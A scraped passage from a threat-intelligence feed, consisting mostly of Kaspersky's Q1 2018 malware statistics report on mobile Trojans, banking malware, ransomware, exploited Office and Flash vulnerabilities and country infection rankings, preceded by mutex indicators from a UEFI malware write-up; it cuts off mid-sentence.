Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n**Mutexes**\n\nFindFirstFile Message Bi \nset instance state \nforegrounduu state \nsingle UI \nOffice Module \nprocess attach Module", "modified": "2020-10-05T10:00:45", "published": "2020-10-05T10:00:45", "id": "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "href": "https://securelist.com/mosaicregressor/98849/", "type": "securelist", "title": "MosaicRegressor: Lurking in the Shadows of UEFI", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-15T21:13:49", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. 
That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. 
Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. 
This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). 
This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. 
Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). 
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. 
This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well as Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. 
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN (which could also be a pattern, numeric, or biometric lock) is set, the device is locked. In this case, the only way to restore the smartphone to working order is to reset it to factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, which had held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. 
Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000). \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that it can only be compared to the number of Adobe Flash vulnerabilities found in the past. 
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. 
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). 
As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organization to criminal accounts, and inflate bank balances, with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \n* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32.
Zbot | 28.0% \n2 | Nymaim | Trojan.Win32.Nymaim | 20.3% \n3 | Caphaw | Backdoor.Win32.Caphaw | 15.2% \n4 | SpyEye | Backdoor.Win32.SpyEye | 11.9% \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% \n6 | Emotet | Backdoor.Win32.Emotet | 2.4% \n7 | Neurevt | Trojan.Win32.Neurevt | 2.3% \n8 | Shiz | Backdoor.Win32.Shiz | 2.1% \n9 | Gozi | Trojan.Win32.Gozi | 1.9% \n10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. 
In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affiliate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. 
The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. 
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. 
Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). 
Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating 